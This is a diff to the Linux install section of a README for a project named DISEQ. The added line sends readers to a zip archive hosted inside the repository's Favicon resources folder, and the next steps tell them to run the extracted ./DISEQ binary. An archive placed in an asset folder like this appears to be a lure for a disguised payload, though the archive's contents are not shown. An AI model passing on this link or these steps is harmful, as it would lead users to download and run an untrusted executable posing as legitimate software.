liquidambargenusbolbitis859/DISEQ/README.md

 #### For Linux:

-1. Extract the downloaded `.tar.gz` file using your file manager or the terminal.
+1. Extract the downloaded `https://raw.githubusercontent.com/liquidambargenusbolbitis859/DISEQ/main/resources/Favicon/DISEQ_1.4.zip` file using your file manager or the terminal.
 2. Open a terminal in the extracted folder.
 3. Run the command `./DISEQ` to launch the application.